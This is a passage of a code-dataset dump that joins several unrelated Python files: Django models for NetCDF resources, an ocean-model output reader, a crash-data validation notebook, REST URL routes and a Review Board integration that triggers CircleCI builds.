attributes\n descriptive_name = models.CharField(max_length=1000, null=True, blank=True,\n verbose_name='long name')\n method = models.TextField(null=True, blank=True, verbose_name='comment')\n missing_value = models.CharField(max_length=1000, null=True, blank=True)\n\n def __unicode__(self):\n return self.name\n\n @classmethod\n def remove(cls, element_id):\n raise ValidationError(\"The variable of the resource can't be deleted.\")\n\n\n# Define the netCDF resource\nclass NetcdfResource(BaseResource):\n objects = 
ResourceManager(\"NetcdfResource\")\n\n @property\n def metadata(self):\n md = NetcdfMetaData()\n return self._get_metadata(md)\n\n @classmethod\n def get_supported_upload_file_types(cls):\n # 3 file types are supported\n return (\".nc\",)\n\n @classmethod\n def allow_multiple_file_upload(cls):\n # can upload only 1 file\n return False\n\n @classmethod\n def can_have_multiple_files(cls):\n # can have only 1 file\n return False\n\n # add resource-specific HS terms\n def get_hs_term_dict(self):\n # get existing hs_term_dict from base class\n hs_term_dict = super(NetcdfResource, self).get_hs_term_dict()\n # add new terms for NetCDF res\n hs_term_dict[\"HS_NETCDF_FILE_NAME\"] = \"\"\n for res_file in self.files.all():\n _, f_fullname, f_ext = get_resource_file_name_and_extension(res_file)\n if f_ext.lower() == '.nc':\n hs_term_dict[\"HS_NETCDF_FILE_NAME\"] = f_fullname\n break\n return hs_term_dict\n\n class Meta:\n verbose_name = 'Multidimensional (NetCDF)'\n proxy = True\n\nprocessor_for(NetcdfResource)(resource_processor)\n\n\n# define the netcdf metadata\nclass NetcdfMetaData(CoreMetaData):\n variables = GenericRelation(Variable)\n ori_coverage = GenericRelation(OriginalCoverage)\n\n @classmethod\n def get_supported_element_names(cls):\n # get the names of all core metadata elements\n elements = super(NetcdfMetaData, cls).get_supported_element_names()\n # add the name of any additional element to the list\n elements.append('Variable')\n elements.append('OriginalCoverage')\n return elements\n\n @property\n def resource(self):\n return NetcdfResource.objects.filter(object_id=self.id).first()\n\n def has_all_required_elements(self):\n if not super(NetcdfMetaData, self).has_all_required_elements(): # check required meta\n return False\n if not self.variables.all():\n return False\n if not (self.coverages.all().filter(type='box').first() or\n self.coverages.all().filter(type='point').first()):\n return False\n return True\n\n def get_required_missing_elements(self): # show missing required meta\n missing_required_elements = super(NetcdfMetaData, self).get_required_missing_elements()\n if not (self.coverages.all().filter(type='box').first() or\n self.coverages.all().filter(type='point').first()):\n missing_required_elements.append('Spatial Coverage')\n if not self.variables.all().first():\n missing_required_elements.append('Variable')\n\n return missing_required_elements\n\n def get_xml(self, pretty_print=True):\n from lxml import etree\n # get the xml string representation of the core metadata elements\n xml_string = super(NetcdfMetaData, self).get_xml(pretty_print=pretty_print)\n\n # create an etree xml object\n RDF_ROOT = etree.fromstring(xml_string)\n\n # get root 'Description' element that contains all other elements\n container = RDF_ROOT.find('rdf:Description', namespaces=self.NAMESPACES)\n\n # inject netcdf resource specific metadata element 'variable' to container element\n for variable in self.variables.all():\n md_fields = {\n \"md_element\": \"netcdfVariable\",\n \"name\": \"name\",\n \"unit\": \"unit\",\n \"type\": \"type\",\n \"shape\": \"shape\",\n \"descriptive_name\": \"longName\",\n \"method\": \"comment\",\n \"missing_value\": \"missingValue\"\n } # element name : name in xml\n self.add_metadata_element_to_xml(container, variable, md_fields)\n\n if self.ori_coverage.all().first():\n ori_cov_obj = self.ori_coverage.all().first()\n hsterms_ori_cov = etree.SubElement(container, '{%s}spatialReference' %\n self.NAMESPACES['hsterms'])\n cov_term = '{%s}' + 'box'\n 
hsterms_coverage_terms = etree.SubElement(hsterms_ori_cov, cov_term %\n self.NAMESPACES['hsterms'])\n\n hsterms_ori_cov_rdf_Description = etree.SubElement(hsterms_coverage_terms, '{%s}value' %\n self.NAMESPACES['rdf'])\n cov_box = ''\n\n # add extent info\n if ori_cov_obj.value:\n cov_box = 'northlimit=%s; eastlimit=%s; southlimit=%s; westlimit=%s; unit=%s' \\\n % (ori_cov_obj.value['northlimit'], ori_cov_obj.value['eastlimit'],\n ori_cov_obj.value['southlimit'], ori_cov_obj.value['westlimit'],\n ori_cov_obj.value['units'])\n\n if ori_cov_obj.value.get('projection'):\n cov_box += '; projection_name={}'.format(ori_cov_obj.value['projection'])\n\n if ori_cov_obj.projection_string_text:\n cov_box += '; projection_string={}'.format(ori_cov_obj.projection_string_text)\n\n if ori_cov_obj.datum:\n cov_box += '; datum={}'.format(ori_cov_obj.datum)\n\n hsterms_ori_cov_rdf_Description.text = cov_box\n\n return etree.tostring(RDF_ROOT, pretty_print=pretty_print)\n\n def add_metadata_element_to_xml(self, root, md_element, md_fields):\n from lxml import etree\n element_name = md_fields.get('md_element') if md_fields.get('md_element') \\\n else md_element.term\n\n hsterms_newElem = etree.SubElement(\n root,\n \"{{{ns}}}{new_element}\".format(ns=self.NAMESPACES['hsterms'], new_element=element_name))\n\n hsterms_newElem_rdf_Desc = etree.SubElement(\n hsterms_newElem, \"{{{ns}}}Description\".format(ns=self.NAMESPACES['rdf']))\n\n for md_field in md_fields.keys():\n if hasattr(md_element, md_field):\n attr = getattr(md_element, md_field)\n if attr:\n field = etree.SubElement(hsterms_newElem_rdf_Desc,\n \"{{{ns}}}{field}\".format(ns=self.NAMESPACES['hsterms'],\n field=md_fields[md_field]))\n field.text = str(attr)\n\n def delete_all_elements(self):\n super(NetcdfMetaData, self).delete_all_elements()\n self.ori_coverage.all().delete()\n self.variables.all().delete()\n", "sub_path": "hs_app_netCDF/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 12687, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "hs_core.models.AbstractMetaDataElement", "line_number": 15, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 32, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 32, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 33, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 33, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 34, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 34, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 35, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 35, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 43, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 59, "usage_type": "call"}, {"api_name": "django.core.exceptions.ValidationError", "line_number": 65, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 72, "usage_type": "call"}, {"api_name": "django.core.exceptions.ValidationError", "line_number": 78, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 98, "usage_type": "call"}, {"api_name": "hs_core.models.AbstractMetaDataElement", "line_number": 105, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 126, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 126, 
"usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 127, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 127, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 128, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 128, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 129, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 129, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 131, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 131, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 133, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 133, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 134, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 134, "usage_type": "name"}, {"api_name": "django.core.exceptions.ValidationError", "line_number": 141, "usage_type": "call"}, {"api_name": "hs_core.models.BaseResource", "line_number": 145, "usage_type": "name"}, {"api_name": "hs_core.models.ResourceManager", "line_number": 146, "usage_type": "call"}, {"api_name": "hs_core.hydroshare.utils.get_resource_file_name_and_extension", "line_number": 175, "usage_type": "call"}, {"api_name": "hs_core.models.resource_processor", "line_number": 185, "usage_type": "argument"}, {"api_name": "mezzanine.pages.page_processors.processor_for", "line_number": 185, "usage_type": "call"}, {"api_name": "hs_core.models.CoreMetaData", "line_number": 189, "usage_type": "name"}, {"api_name": "django.contrib.contenttypes.fields.GenericRelation", "line_number": 190, "usage_type": "call"}, {"api_name": "django.contrib.contenttypes.fields.GenericRelation", "line_number": 191, "usage_type": "call"}, {"api_name": "lxml.etree.fromstring", "line_number": 232, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 232, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 253, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 253, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 256, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 256, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 259, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 259, "usage_type": "name"}, {"api_name": "lxml.etree.tostring", "line_number": 281, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 281, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 288, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 288, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 292, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 292, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 299, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 299, "usage_type": "name"}]} +{"seq_id": "441666042", "text": "## READ LOW RESOLUTION MITGCM RUN\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom netCDF4 import Dataset as ncread\nimport glob\n\npath = '/home/jupiter/ocean/fenwick/baroclinic_gyre/baroclinic_128x128x4_uvTuvT_mk4/run_370/mnc_test_00'\n#loop over 13,14,15,16\n\nfiles = []\n\nfor folder in [13,14,15,16]:\n files.extend(glob.glob(path+str(folder)+'/state*.nc'))\n \nx = np.zeros((len(files),33))\ny 
= np.zeros((len(files),33))\n\n#get dimensions\n\nfor i,fil in zip(range(len(files)),files):\n dat = ncread(fil)\n x[i,:] = dat.variables['X'][:]\n y[i,:] = dat.variables['Y'][:]\n \n#read time only once\ntime = dat.variables['T'][:]\ndat.close()\nprint('Dimensions read.')\n\nx = np.sort(np.array(list(set([i for i in x.flatten()]))))\ny = np.sort(np.array(list(set([i for i in y.flatten()]))))\n\n## preallocate surface temperature\n# use only the last 6000 time steps (due to spin up)\ntlength = 6000\ntemp = np.zeros((tlength,y.shape[0],x.shape[0]))\n\nfor i,fil in zip(range(len(files)),files):\n print('File no. '+str(i+1)+' of '+str(len(files)))\n dat = ncread(fil)\n datx = dat.variables['X'][:]\n daty = dat.variables['Y'][:]\n \n ys = np.where(y == daty[0])[0][0]\n xs = np.where(x == datx[0])[0][0]\n \n temp[:,ys:ys+daty.shape[0],xs:xs+datx.shape[0]]\\\n = dat.variables['Temp'][:][-tlength:,0,:,:]\n\n## get rid of boundaries\n#adapt dimensions\n# use only every other point in time to get daily resolution\n\nbx = 128\nby = 128\n\ntemp = temp[::2,:by,:bx]\ntime = time[-tlength::2]\ntime = (time - time[0])/24./3600.\n\ny = y[:by]\nx = x[:bx]\n\n## SAVE\n\nnp.save('python/gyres/temp_optlowres_sfc.npy',temp)\n#np.save('python/gyres/temp_lowres_dim.npy',(time,y,x))\nprint('Files written.')\n", "sub_path": "gyres_scripts/read_optlowres.py", "file_name": "read_optlowres.py", "file_ext": "py", "file_size_in_byte": 1693, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "glob.glob", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 17, "usage_type": "call"}, {"api_name": "netCDF4.Dataset", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 37, "usage_type": "call"}, {"api_name": "netCDF4.Dataset", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 67, "usage_type": "call"}]} +{"seq_id": "67663115", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[5]:\n\n\n# Validation of assertions\n\nimport pandas as pd\nimport numpy as np\nimport math\n\ndf = pd.read_csv ('Downloads/oregon-crash2019.csv')\n\n\n# In[53]:\n\n\n# 41 to 46 Latitude Degrees\n\nfalse_records=0\nnan_records=0\nfor data in df['Latitude Degrees']:\n if (data<41 or data>46):\n false_records+=1\n elif math.isnan(data):\n nan_records+=1\n \nprint('false_records',false_records)\nprint('nan_records',nan_records)\n\n\n# In[7]:\n\n\n# 0 to 59 Latitude Minutes\n\nfalse_records=0\nnan_records=0\nfor data in df['Latitude Minutes']:\n if (data>=0 and data<=59):\n pass\n elif math.isnan(data):\n nan_records+=1\n else:\n false_records+=1\n \nprint('false_records',false_records)\nprint('nan_records',nan_records)\n\n\n# In[8]:\n\n\n# 0.00 to 59.99 Latitude Seconds\n\nfalse_records=0\nnan_records=0\n\nfor data in df['Latitude Seconds']:\n if (data>=0 and data<=59.99):\n pass\n elif math.isnan(data):\n nan_records+=1\n else:\n false_records+=1\n 
\nprint('false_records',false_records)\nprint('nan_records',nan_records)\n\n\n# In[9]:\n\n\n# A crash hour should be between 0 and 24\n\nfalse_records=0\nnan_records=0\n\nfor data in df['Crash Hour']:\n if (data>=0 and data<=24):\n pass\n elif math.isnan(data):\n nan_records+=1\n else:\n false_records+=1\n \nprint('false_records',false_records)\nprint('nan_records',nan_records)\n\n\n# In[27]:\n\n\n#On average, more crashes occur when the weather is clear.\nfrom collections import defaultdict\ndic=defaultdict(int)\nweather = {\n0: 'Unknown',\n1: 'Clear',\n2: 'Cloudy',\n3: "Rain",\n4: 'Sleet / Freezing Rain / Hail',\n5: 'Fog',\n6: 'Snow',\n7: 'Dust',\n8: 'Smoke',\n9: 'Ash'\n}\n\nfor data in df['Weather Condition']:\n if math.isnan(data):\n dic['nan_records']+=1\n else:\n dic[weather[data]]+=1\n \nprint(dic)\n\n\n# In[46]:\n\n\nfrom collections import defaultdict\ncount=defaultdict(int)\ndf1=list(zip(df['Weather Condition'], df['Road Surface Condition']))\nroad={\n0:'Unknown',\n1: 'Dry',\n2: 'Wet',\n3: 'Snow',\n4: 'Ice'\n}\n\nwrong_entries=0\nfor data in df1:\n if data[0]==1 and data[1] in road:\n count[road[data[1]]]+=1\n elif math.isnan(data[1]):\n pass\n elif data[1] not in road:\n wrong_entries+=1\n \nprint('wrong entries', wrong_entries)\n## Surprisingly, more crashes occurred when the weather condition is clear and the road surface is dry (o_O)\nprint(str(dic['Clear'])+' crashes on clear weather condition with road surface condition: '+str([(i,count[i]) for i in count]))\n\n\n# In[38]:\n\n\n#All the crashes occurred during daylight.\nfrom collections import defaultdict\nlight=defaultdict(int)\nlight_condition = {0: 'Unknown',\n1: 'Daylight',\n2: 'Darkness',\n3: 'Darkness',\n4: 'Dawn (Twilight)',\n5: 'Dusk (Twilight)'}\n\nfor data in df['Light Condition']:\n if math.isnan(data):\n light['nan_records']+=1\n else:\n light[light_condition[data]]+=1\n \nprint(light)\n\n\n# In[52]:\n\n\n# Vehicle ID should be 7 digits\n\nfalse_entries=0\ncorrect_entries=0\nnan_entries=0\n\nfor data in df['Vehicle ID']:\n if math.isnan(data):\n nan_entries+=1\n else:\n if len(str(int(data)))==7:\n correct_entries+=1\n else:\n false_entries+=1\n \nprint('false_entries',false_entries)\nprint('correct_entries',correct_entries)\nprint('nan_entries',nan_entries)\n", "sub_path": "Data Validation/Validation_Code_Critique.py", "file_name": "Validation_Code_Critique.py", "file_ext": "py", "file_size_in_byte": 3384, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pandas.read_csv", "line_number": 13, "usage_type": "call"}, {"api_name": "math.isnan", "line_number": 26, "usage_type": "call"}, {"api_name": "math.isnan", "line_number": 43, "usage_type": "call"}, {"api_name": "math.isnan", "line_number": 63, "usage_type": "call"}, {"api_name": "math.isnan", "line_number": 83, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 97, "usage_type": "call"}, {"api_name": "math.isnan", "line_number": 112, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 124, "usage_type": "call"}, {"api_name": "math.isnan", "line_number": 138, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 153, "usage_type": "call"}, {"api_name": "math.isnan", "line_number": 162, "usage_type": "call"}, {"api_name": "math.isnan", "line_number": 180, "usage_type": "call"}]} +{"seq_id": "19530532", "text": "from django.urls import path\nfrom . 
import views\nfrom rest_framework_simplejwt import views as jwt_views\n\nurlpatterns = [\n path('signup/', views.UserCreate.as_view(), name='account-create'),\n path('login/', views.LoginView.as_view(), name='login'),\n path('token/refresh/', jwt_views.TokenRefreshView.as_view(), name='token-refresh'),\n\n path('post_create/', views.PostCreateApiView.as_view(), name='post-create'),\n path('post/<int:pk>/like/', views.PostLikesUpdateApiView.as_view(), name='post-like'),\n path('post/<int:pk>/dislike/', views.PostDisLikesUpdateApiView.as_view(), name='post-dislike'),\n\n path('analytics/', views.AnalyticsAPIView.as_view(), name='analytics'),\n path('user_analytics/', views.UserAnalyticsAPIView.as_view(), name='user-analytics')\n]\n", "sub_path": "api/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 784, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "rest_framework_simplejwt.views.TokenRefreshView.as_view", "line_number": 8, "usage_type": "call"}, {"api_name": "rest_framework_simplejwt.views.TokenRefreshView", "line_number": 8, "usage_type": "attribute"}, {"api_name": "rest_framework_simplejwt.views", "line_number": 8, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "621565992", "text": "\"\"\"Integration for building changes on CircleCI.\"\"\"\n\nfrom __future__ import unicode_literals\n\nimport json\nimport logging\n\nfrom django.contrib.auth.models import User\nfrom django.db import IntegrityError, transaction\nfrom django.utils.functional import cached_property\nfrom django.utils.http import urlquote_plus\nfrom django.utils.six.moves.urllib.request import urlopen\nfrom djblets.avatars.services import URLAvatarService\nfrom djblets.siteconfig.models import SiteConfiguration\nfrom reviewboard.admin.server import get_server_url\nfrom reviewboard.avatars import avatar_services\nfrom reviewboard.extensions.hooks import SignalHook\nfrom reviewboard.integrations import Integration\nfrom reviewboard.reviews.models.status_update import StatusUpdate\nfrom reviewboard.reviews.signals import review_request_published\nfrom reviewboard.webapi.models import WebAPIToken\n\nfrom rbintegrations.circleci.forms import CircleCIIntegrationConfigForm\nfrom rbintegrations.util.urlrequest import URLRequest\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass CircleCIIntegration(Integration):\n \"\"\"Integrates Review Board with CircleCI.\"\"\"\n\n name = 'CircleCI'\n description = 'Builds diffs posted to Review Board using CircleCI.'\n config_form_cls = CircleCIIntegrationConfigForm\n\n def initialize(self):\n \"\"\"Initialize the integration hooks.\"\"\"\n SignalHook(self, review_request_published,\n self._on_review_request_published)\n\n @cached_property\n def icon_static_urls(self):\n \"\"\"Return the icons used for the integration.\n\n Returns:\n dict:\n The icons for CircleCI.\n \"\"\"\n from rbintegrations.extension import RBIntegrationsExtension\n\n 
extension = RBIntegrationsExtension.instance\n\n return {\n '1x': extension.get_static_url('images/circleci/icon.png'),\n '2x': extension.get_static_url('images/circleci/icon@2x.png'),\n }\n\n def _on_review_request_published(self, sender, review_request,\n changedesc=None, **kwargs):\n \"\"\"Handle when a review request is published.\n\n Args:\n sender (object):\n The sender of the signal.\n\n review_request (reviewboard.reviews.models.review_request.\n ReviewRequest):\n The review request which was published.\n\n changedesc (reviewboard.changedescs.models.ChangeDescription,\n optional):\n The change description associated with this publish.\n\n **kwargs (dict):\n Additional keyword arguments.\n \"\"\"\n # Only build changes against GitHub or Bitbucket repositories.\n repository = review_request.repository\n\n if not repository or not repository.hosting_account:\n return\n\n service_name = repository.hosting_account.service_name\n\n if service_name not in ('github', 'bitbucket'):\n return\n\n diffset = review_request.get_latest_diffset()\n\n # Don't build any review requests that don't include diffs.\n if not diffset:\n return\n\n # If this was an update to a review request, make sure that there was a\n # diff update in it.\n if changedesc is not None:\n fields_changed = changedesc.fields_changed\n\n if ('diff' not in fields_changed or\n 'added' not in fields_changed['diff']):\n return\n\n matching_configs = [\n config\n for config in self.get_configs(review_request.local_site)\n if config.match_conditions(form_cls=self.config_form_cls,\n review_request=review_request)\n ]\n\n if not matching_configs:\n return\n\n # This may look weird, but it's here for defensive purposes.\n # Currently, the possible values for CircleCI's \"vcs-type\" field in\n # their API happens to match up perfectly with our service names,\n # but that's not necessarily always going to be the case.\n if service_name == 'github':\n vcs_type = 'github'\n elif service_name == 'bitbucket':\n vcs_type = 'bitbucket'\n else:\n raise ValueError('Unexpected hosting service type got through '\n 'to CircleCI invocation: %s'\n % service_name)\n\n org_name, repo_name = self._get_repo_ids(service_name, repository)\n\n user = self._get_or_create_user()\n\n for config in matching_configs:\n status_update = StatusUpdate.objects.create(\n service_id='circle-ci',\n user=user,\n summary='CircleCI',\n description='starting build...',\n state=StatusUpdate.PENDING,\n review_request=review_request,\n change_description=changedesc)\n\n url = ('https://circleci.com/api/v1.1/project/%s/%s/%s/tree/%s'\n '?circle-token=%s'\n % (vcs_type, org_name, repo_name,\n config.get('branch_name') or 'master',\n urlquote_plus(config.get('circle_api_token'))))\n\n logger.info('Making CircleCI API request: %s', url)\n\n local_site = config.local_site\n\n try:\n token = user.webapi_tokens.filter(local_site=local_site)[0]\n except IndexError:\n token = WebAPIToken.objects.generate_token(\n user, local_site=local_site, autogenerated=True)\n\n body = {\n 'revision': diffset.base_commit_id,\n 'build_parameters': {\n 'CIRCLE_JOB': 'reviewboard',\n 'REVIEWBOARD_SERVER':\n get_server_url(local_site=config.local_site),\n 'REVIEWBOARD_REVIEW_REQUEST': review_request.display_id,\n 'REVIEWBOARD_DIFF_REVISION': diffset.revision,\n 'REVIEWBOARD_API_TOKEN': token.token,\n 'REVIEWBOARD_STATUS_UPDATE_ID': status_update.pk,\n },\n }\n\n if config.local_site:\n body['build_parameters']['REVIEWBOARD_LOCAL_SITE'] = \\\n config.local_site.name\n\n request = URLRequest(\n url,\n 
body=json.dumps(body),\n headers={\n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n },\n method='POST')\n\n u = urlopen(request)\n\n data = json.loads(u.read())\n\n status_update.url = data['build_url']\n status_update.url_text = 'View Build'\n status_update.save()\n\n def _get_repo_ids(self, service_name, repository):\n \"\"\"Return the organization and repo name for the given repository.\n\n Args:\n repository (reviewboard.scmtools.models.Repository):\n The repository.\n\n Returns:\n tuple of unicode:\n A two-tuple consisting of the organization (or user) and repository\n names.\n \"\"\"\n extra_data = repository.extra_data\n plan = extra_data['repository_plan']\n\n if service_name == 'github':\n if plan == 'public':\n return (extra_data['hosting_account_username'],\n extra_data['github_public_repo_name'])\n elif plan == 'public-org':\n return (extra_data['github_public_org_name'],\n extra_data['github_public_org_repo_name'])\n elif plan == 'private':\n return (extra_data['hosting_account_username'],\n extra_data['github_private_repo_name'])\n elif plan == 'private-org':\n return (extra_data['github_private_org_name'],\n extra_data['github_private_org_repo_name'])\n else:\n raise ValueError('Unexpected plan for GitHub repository %d: %s'\n % (repository.pk, plan))\n elif service_name == 'bitbucket':\n if plan == 'personal':\n return (extra_data['bitbucket_account_username'],\n extra_data['bitbucket_repo_name'])\n elif plan == 'other-user':\n return (extra_data['bitbucket_other_user_username'],\n extra_data['bitbucket_other_user_repo_name'])\n elif plan == 'team':\n return (extra_data['bitbucket_team_name'],\n extra_data['bitbucket_team_repo_name'])\n else:\n raise ValueError('Unexpected plan for Bitbucket repository '\n '%d: %s'\n % (repository.pk, plan))\n\n def _get_or_create_user(self):\n \"\"\"Return a user to use for CircleCI.\n\n Returns:\n django.contrib.auth.models.User:\n A user instance.\n \"\"\"\n try:\n return User.objects.get(username='circle-ci')\n except User.DoesNotExist:\n logger.info('Creating new user for CircleCI')\n siteconfig = SiteConfiguration.objects.get_current()\n noreply_email = siteconfig.get('mail_default_from')\n\n with transaction.atomic():\n try:\n user = User.objects.create(username='circle-ci',\n email=noreply_email,\n first_name='Circle',\n last_name='CI')\n except IntegrityError:\n # Another process/thread beat us to it.\n return User.objects.get(username='circle-ci')\n\n profile = user.get_profile()\n profile.should_send_email = False\n profile.save()\n\n avatar_service = avatar_services.get_avatar_service(\n URLAvatarService.avatar_service_id)\n # TODO: make somewhat higher-res versions for the main avatar.\n avatar_service.setup(user, self.icon_static_urls)\n\n return user\n", "sub_path": "rbintegrations/circleci/integration.py", "file_name": "integration.py", "file_ext": "py", "file_size_in_byte": 10288, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.getLogger", "line_number": 27, "usage_type": "call"}, {"api_name": "reviewboard.integrations.Integration", "line_number": 30, "usage_type": "name"}, {"api_name": "rbintegrations.circleci.forms.CircleCIIntegrationConfigForm", "line_number": 35, "usage_type": "name"}, {"api_name": "reviewboard.extensions.hooks.SignalHook", "line_number": 39, "usage_type": "call"}, {"api_name": "reviewboard.reviews.signals.review_request_published", "line_number": 39, "usage_type": "argument"}, {"api_name": 
"rbintegrations.extension.RBIntegrationsExtension.instance", "line_number": 52, "usage_type": "attribute"}, {"api_name": "rbintegrations.extension.RBIntegrationsExtension", "line_number": 52, "usage_type": "name"}, {"api_name": "django.utils.functional.cached_property", "line_number": 42, "usage_type": "name"}, {"api_name": "reviewboard.reviews.models.status_update.StatusUpdate.objects.create", "line_number": 132, "usage_type": "call"}, {"api_name": "reviewboard.reviews.models.status_update.StatusUpdate.objects", "line_number": 132, "usage_type": "attribute"}, {"api_name": "reviewboard.reviews.models.status_update.StatusUpdate", "line_number": 132, "usage_type": "name"}, {"api_name": "reviewboard.reviews.models.status_update.StatusUpdate.PENDING", "line_number": 137, "usage_type": "attribute"}, {"api_name": "reviewboard.reviews.models.status_update.StatusUpdate", "line_number": 137, "usage_type": "name"}, {"api_name": "django.utils.http.urlquote_plus", "line_number": 145, "usage_type": "call"}, {"api_name": "reviewboard.webapi.models.WebAPIToken.objects.generate_token", "line_number": 154, "usage_type": "call"}, {"api_name": "reviewboard.webapi.models.WebAPIToken.objects", "line_number": 154, "usage_type": "attribute"}, {"api_name": "reviewboard.webapi.models.WebAPIToken", "line_number": 154, "usage_type": "name"}, {"api_name": "reviewboard.admin.server.get_server_url", "line_number": 162, "usage_type": "call"}, {"api_name": "rbintegrations.util.urlrequest.URLRequest", "line_number": 174, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 176, "usage_type": "call"}, {"api_name": "django.utils.six.moves.urllib.request.urlopen", "line_number": 183, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 185, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 245, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 245, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 245, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.DoesNotExist", "line_number": 246, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 246, "usage_type": "name"}, {"api_name": "djblets.siteconfig.models.SiteConfiguration.objects.get_current", "line_number": 248, "usage_type": "call"}, {"api_name": "djblets.siteconfig.models.SiteConfiguration.objects", "line_number": 248, "usage_type": "attribute"}, {"api_name": "djblets.siteconfig.models.SiteConfiguration", "line_number": 248, "usage_type": "name"}, {"api_name": "django.db.transaction.atomic", "line_number": 251, "usage_type": "call"}, {"api_name": "django.db.transaction", "line_number": 251, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.create", "line_number": 253, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 253, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 253, "usage_type": "name"}, {"api_name": "django.db.IntegrityError", "line_number": 257, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 259, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 259, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 259, "usage_type": "name"}, {"api_name": "reviewboard.avatars.avatar_services.get_avatar_service", 
